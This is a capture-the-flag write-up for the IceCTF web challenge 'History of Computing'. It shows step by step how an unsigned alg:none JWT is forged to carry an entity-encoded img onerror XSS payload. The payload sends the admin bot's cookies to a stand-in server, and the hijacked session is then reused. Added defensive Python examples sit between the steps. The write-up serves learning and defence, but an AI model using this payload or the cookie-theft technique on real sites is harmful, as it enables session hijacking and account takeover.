Tags: jwt xss web 


# ▼▼▼History of Computing (Web4, 350pts)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

## 【Understanding of functions】

・When logging in, a `JWT (JSON Web Token)` is issued

・In the comment field, `<>` and similar characters are escaped

・A comment can be reported to the administrator

・When a report is submitted, the contributor's name and the comment contents are displayed

・The cookies (`session` and `token`) do not have `HttpOnly`
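The missing `HttpOnly` flag is what later lets `document.cookie` hand both cookies to an injected script. As an added example (not part of the original writeup), here is a small Python auditor for `Set-Cookie` flags: `audit_set_cookie` lists the protections a header lacks and `hardened_set_cookie` builds the header the way the application should have sent it. The cookie value is the page's own session value; the function names and the exact original header are assumptions.

```python
from http.cookies import SimpleCookie


def audit_set_cookie(header_value: str) -> list:
    """Return the protections a Set-Cookie header lacks.

    HttpOnly keeps the cookie out of document.cookie (which is how the token and
    session were exfiltrated in this challenge), Secure keeps it off plaintext
    HTTP, and SameSite limits cross-site sends.
    """
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:  # parts[0] is the name=value pair itself
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip()
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    if "samesite" not in attrs:
        findings.append("missing SameSite")
    elif attrs["samesite"].lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None requires Secure")
    return findings


def hardened_set_cookie(name: str, value: str) -> str:
    """Emit a Set-Cookie header with all three protections set."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    cookie[name]["httponly"] = True
    cookie[name]["secure"] = True
    cookie[name]["samesite"] = "Lax"
    return cookie[name].OutputString()


# Constructed sample: the session cookie from this writeup as the server evidently
# sent it (only a Path attribute; the exact original header is an assumption).
CHALLENGE_SESSION = "session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM; Path=/"

if __name__ == "__main__":
    print(audit_set_cookie(CHALLENGE_SESSION))
    print(hardened_set_cookie("session", "eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM"))
```

Run against the challenge's cookie the auditor reports all three flags missing; run against its own hardened output it reports nothing.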

---

`session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM`

・The first part decodes to `{"user":3}`

・The random-looking value at the end appears to be a signature that prevents tampering

`{"user": 1}` is likely to be the admin

---

Decoding `token` with Base64 gives:

`{"typ":"JWT","alg":"none"}.{"username":"kazkiti'or''='","flag":"IceCTF{hope you don't think this is a real flag}"}.`

・The `flag` claim is a fake flag

・Because of `"alg":"none"`, this is a JWT without a signature. Even if I modify it and send it, it is accepted (tamperable)
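To make the `alg: none` problem concrete, here is an added Python example (mine, not the challenge's code): `decode_unverified` models the observed server behaviour of trusting whatever the header says and never checking a signature, while `verify_hs256` is the hardened check, pinning the algorithm server-side and comparing the HMAC in constant time. The token is the unsigned admin token from this page; the HMAC key and the function names are assumptions.

```python
import base64
import hashlib
import hmac
import json

# The unsigned token seen on this page: alg "none" and an empty third segment.
ALG_NONE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9."
)


def b64url_decode(s: str) -> bytes:
    """Base64url decode, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_unverified(token: str):
    """What the challenge server effectively does: return header and payload
    without checking any signature (vulnerable)."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token (constructed key, see lead-in)."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, key: bytes):
    """Hardened check: the accepted algorithm is fixed in code, never read from
    the token, and the MAC is compared in constant time. Returns the payload
    on success or None on any failure."""
    try:
        h, p, sig = token.split(".")
        header = json.loads(b64url_decode(h))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # rejects "none", "None", RS256 confusion, etc.
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return None
        return json.loads(b64url_decode(p))
    except ValueError:  # malformed base64, JSON, or segment count
        return None


if __name__ == "__main__":
    print(decode_unverified(ALG_NONE_TOKEN))          # vulnerable path: admin claims accepted
    print(verify_hs256(ALG_NONE_TOKEN, b"server-secret"))  # hardened path: None
```

The practical point is that the allowed algorithm must live in the verifier, not in the token: any verifier that reads `alg` from the header and dispatches on it will accept the unsigned token above.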

---

## 【Identify the vulnerability】

### 【Try1: Brute-forcing the secret key of the session cookie】

I brute-forced for about 30 minutes, but the secret key was not found...

---

### 【Try2: Tamper with the username in the token and trigger XSS via the report】

Modify as below and Base64-encode

{"typ":"JWT","alg":"none"} ⇒ eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=

{"username":"<>","flag":"tes"} ⇒ eyJ1c2VybmFtZSI6Ijw+IiwiZmxhZyI6InRlcyJ9

token= `eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6Ijw+IiwiZmxhZyI6InRlcyJ9.`

↓ Send the report

```
GET /report/d2179646ad3710c23f73b72c6fdb66 HTTP/1.1
Host: enf5svgjhw5lsm7-history.labs.icec.tf
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6Ijw+IiwiZmxhZyI6InRlcyJ9.;session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM
```

The username is not escaped, so **XSS** is possible

---

## 【Confirm XSS filter】

`<script>alert(1)</script>` ⇒ `HACKER ALERT!!!!1` (blocked)

`<svg onload=alert(1)>` ⇒ `HACKER ALERT!!!!1` (blocked)

`<img onerror=alert(1)></img>` ⇒ `OK` (passes the filter)
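The three probes show a keyword blacklist, and the fix is output encoding rather than a longer keyword list. As an added example (not the challenge's code), the Python below contrasts a constructed blacklist that reproduces the three verdicts with contextual HTML escaping, and shows why entity-encoded handler text gets past a filter that reads raw attribute values: the browser decodes character references before handing the attribute to the script engine. The blacklist pattern and function names are assumptions.

```python
import html
import re

# Constructed approximation of the challenge's blacklist. The real filter is
# unknown; this one only reproduces the three verdicts observed above.
BLOCKED = re.compile(r"<script|<svg|onload", re.IGNORECASE)


def blacklist_filter(value: str) -> str:
    """Return the challenge's verdict: the canned alert, or the input unchanged."""
    return "HACKER ALERT!!!!1" if BLOCKED.search(value) else value


def render_report_vulnerable(username: str) -> str:
    """Report page as the challenge behaves: the username is inserted raw once
    it has slipped past the keyword list."""
    return f"<p>Reported by: {blacklist_filter(username)}</p>"


def render_report_hardened(username: str) -> str:
    """Contextual output encoding: the username is escaped for an HTML text
    context, so no tag or attribute can be formed whatever keywords it holds."""
    return f"<p>Reported by: {html.escape(username, quote=True)}</p>"


def browser_view_of_attribute(attribute_value: str) -> str:
    """What the HTML parser hands to the script engine for an event-handler
    attribute: character references are decoded first, so a filter inspecting
    the raw attribute text sees entities where the browser sees code."""
    return html.unescape(attribute_value)


SAMPLES = [
    "<script>alert(1)</script>",
    "<svg onload=alert(1)>",
    "<img onerror=alert(1)></img>",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:34} filter  -> {blacklist_filter(s)!r}")
        print(f"{'':34} escaped -> {render_report_hardened(s)!r}")
    # A short constructed entity string, decoded the way the browser would.
    print(browser_view_of_attribute("&#x61&#x6c&#x65&#x72&#x74"))
```

Python's `html.unescape` accepts numeric references without a trailing semicolon, matching the lenient parsing browsers apply inside attribute values.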

---

## 【Identify the administrator's browser】


User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) `PhantomJS/2.1.1` Safari/538.1

It is `PhantomJS`

---

## 【Exploit】

`location='//my_server/?token='+document.cookie`

↓ Encode it as numeric character references (alternatively, escape the double quotes with `\"` and insert it into the JWT as-is)

`&#x6c&#x6f&#x63&#x61&#x74&#x69&#x6f&#x6e&#x3d&#x27&#x2f&#x2f&#x6d&#x79&#x5f&#x73&#x65&#x72&#x76&#x65&#x72&#x2f&#x3f&#x74&#x6f&#x6b&#x65&#x6e&#x3d&#x27&#x2b&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x63&#x6f&#x6f&#x6b&#x69&#x65`

↓ Insert the above into the `onerror` attribute of an `img` tag

```
<img onerror="&#x6c&#x6f&#x63&#x61&#x74&#x69&#x6f&#x6e&#x3d&#x27&#x2f&#x2f&#x6d&#x79&#x5f&#x73&#x65&#x72&#x76&#x65&#x72&#x2f&#x3f&#x74&#x6f&#x6b&#x65&#x6e&#x3d&#x27&#x2b&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x63&#x6f&#x6f&#x6b&#x69&#x65"></img>
```

↓ Insert it into the JWT payload

```
{"username":"<img onerror="&#x6c&#x6f&#x63&#x61&#x74&#x69&#x6f&#x6e&#x3d&#x27&#x2f&#x2f&#x6d&#x79&#x5f&#x73&#x65&#x72&#x76&#x65&#x72&#x2f&#x3f&#x74&#x6f&#x6b&#x65&#x6e&#x3d&#x27&#x2b&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x63&#x6f&#x6f&#x6b&#x69&#x65"></img>
","flag":"tes"}
```

↓ encode by base64

`eyJ1c2VybmFtZSI6IjxpbWcgb25lcnJvcj0iJiN4NmMmI3g2ZiYjeDYzJiN4NjEmI3g3NCYjeDY5JiN4NmYmI3g2ZSYjeDNkJiN4MjcmI3gyZiYjeDJmJiN4NmQmI3g3OSYjeDVmJiN4NzMmI3g2NSYjeDcyJiN4NzYmI3g2NSYjeDcyJiN4MmYmI3gzZiYjeDc0JiN4NmYmI3g2YiYjeDY1JiN4NmUmI3gzZCYjeDI3JiN4MmImI3g2NCYjeDZmJiN4NjMmI3g3NSYjeDZkJiN4NjUmI3g2ZSYjeDc0JiN4MmUmI3g2MyYjeDZmJiN4NmYmI3g2YiYjeDY5JiN4NjUiPjwvaW1nPgoiLCJmbGFnIjoidGVzIn0=`

↓ Send the report

```
GET /report/d2179646ad3710c23f73b72c6fdb66 HTTP/1.1
Host: enf5svgjhw5lsm7-history.labs.icec.tf
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6IjxpbWcgb25lcnJvcj0iJiN4NmMmI3g2ZiYjeDYzJiN4NjEmI3g3NCYjeDY5JiN4NmYmI3g2ZSYjeDNkJiN4MjcmI3gyZiYjeDJmJiN4NmQmI3g3OSYjeDVmJiN4NzMmI3g2NSYjeDcyJiN4NzYmI3g2NSYjeDcyJiN4MmYmI3gzZiYjeDc0JiN4NmYmI3g2YiYjeDY1JiN4NmUmI3gzZCYjeDI3JiN4MmImI3g2NCYjeDZmJiN4NjMmI3g3NSYjeDZkJiN4NjUmI3g2ZSYjeDc0JiN4MmUmI3g2MyYjeDZmJiN4NmYmI3g2YiYjeDY5JiN4NjUiPjwvaW1nPgoiLCJmbGFnIjoidGVzIn0.; session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM
```

↓ A request arrived at my_server

```
35.237.124.125 - - [13/Sep/2018:08:57:22 +0000] "GET /?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.;%20session=eyJ1c2VyIjoxfQ.Dnu38g.uaXk39jmrGGRtOSqu_14-T7_hPs HTTP/1.1" 200 3
```
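From the defending side, the interesting artifact in that log line is an authentication token travelling in a query string to a foreign host, which is what an egress proxy or WAF rule should flag. As an added example (mine, not the writeup's), the Python below parses an Apache-style access-log line, URL-decodes the request target, and reports every three-segment base64url value whose first segment is a JSON object: an `alg` key marks a JWT and its claims are decoded, anything else is reported as a signed session blob. The sample line is the one above, embedded so the script runs offline; the regexes and function names are assumptions.

```python
import base64
import json
import re
from urllib.parse import unquote

# Constructed sample: the access-log line shown above, embedded for an offline run.
SAMPLE_LOG = (
    '35.237.124.125 - - [13/Sep/2018:08:57:22 +0000] "GET /?token='
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9."
    ';%20session=eyJ1c2VyIjoxfQ.Dnu38g.uaXk39jmrGGRtOSqu_14-T7_hPs HTTP/1.1" 200 3'
)

# Apache/nginx "common" log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Three dot-separated base64url segments; the last may be empty (alg "none").
TOKEN_RE = re.compile(r"([A-Za-z0-9_-]+)\.([A-Za-z0-9_-]+)\.([A-Za-z0-9_-]*)")


def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def decode_json_segment(seg: str):
    """Decode a segment as base64url JSON; None if it is not a JSON object."""
    try:
        obj = json.loads(b64url_decode(seg))
    except ValueError:  # bad base64, bad UTF-8, or bad JSON
        return None
    return obj if isinstance(obj, dict) else None


def find_leaked_tokens(log_line: str) -> list:
    """Report token-shaped values carried in the request target of one log line."""
    m = LOG_RE.match(log_line)
    if not m:
        return []
    target = unquote(m.group("target"))  # document.cookie was sent URL-encoded
    hits = []
    for tok in TOKEN_RE.finditer(target):
        first = decode_json_segment(tok.group(1))
        if first is None:
            continue  # e.g. "materialize.min.js" matches the shape but is not a token
        hit = {"src": m.group("ip"), "value": tok.group(0)}
        if "alg" in first:
            hit.update(kind="jwt", alg=first["alg"], claims=decode_json_segment(tok.group(2)))
        else:
            hit.update(kind="signed-session", claims=first)
        hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in find_leaked_tokens(SAMPLE_LOG):
        print(hit["kind"], hit["src"], hit.get("alg"), hit["claims"])
```

On the sample line this yields two findings: an `alg: none` JWT whose claims name `admin`, and a signed session blob for `{"user": 1}`, which together are exactly the admin identity that was stolen.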

↓ Check the received token

`token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.`

↓ Decode by Base64

`{"typ":"JWT","alg":"none"}.{"username":"admin","flag":"IceCTF{hope you don't think this is a real flag}"}.`

This is a fake flag too...

---

Log in as admin with the leaked `session` cookie

```
GET / HTTP/1.1
Host: enf5svgjhw5lsm7-history.labs.icec.tf
Cookie: session=eyJ1c2VyIjoxfQ.Dnu38g.uaXk39jmrGGRtOSqu_14-T7_hPs;
```

```

<html>
<head>

<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">

<link type="text/css" rel="stylesheet" href="/static/css/materialize.min.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/main.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/style.css" media="screen,projection"/>


<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
</head>
<body>

<nav>
<div class="nav-wrapper white">
<div class="container">
History of Computing


</div>
</div>
</nav>

<div class="ribbon pink"></div>
<div class="container">

<div class="flag center blue white-text">
IceCTF{who_trusts_these_cookies_anyway?}
</div>

<div class="row post">
<div class="col s12">
<div class="card">
<div class="card-image">

<span>The First Compiler</span>
</div>

comment

<div class="card-content">
<h5>IceCTF Worked on The First Compiler</h5>

It's not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper


The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.


Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.


</div>
</div>
</div>
</div>

</div>

<div class="ribbon cyan"></div>
<div class="container">
<div class="row">
<div class="col s12">
<div class="card">
<div class="card-image">

<span>The ENIAC!</span>
</div>

comment

<div class="card-content">
<h5>The IceCTF Team Created The ENIAC!</h5>

Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC!


There's no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".


Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.


</div>
</div>
</div>
</div>

</div>

<footer class="page-footer grey darken-3">
<div class="container">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Me</h5>

I like blogging about images. I hope you join me on my journey of exploring the world with me!


</div>
</div>
</div>
<div class="footer-copyright">
<div class="container">
Made with Materialize
</div>
</div>
</footer>

<div id="comment-modal" class="modal">
<nav class="cyan">
<div class="nav-wrapper">
<div class="left col s12 m5 l5">


</div>
<div class="col s12 m7 l7 hide-on-med-and-down">

</div>

</div>
</nav>
<div class="modal-content">
<form id="comment-form" action="/comment" method="post">
<div class="input-field">
<textarea id="comment" class="materialize-textarea" length="500"></textarea>
<label for="comment">Comment</label>
</div>
<input type="hidden" name="postId" id="postId" value="2">
</form>
</div>
</div>
</div>


<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
<script type="text/javascript" src="/static/js/materialize.min.js"></script>
<script type="text/javascript" src="/static/js/init.js"></script>
<script type="text/javascript" src="/static/js/main.js"></script>
</body>
</html>
```

`IceCTF{who_trusts_these_cookies_anyway?}`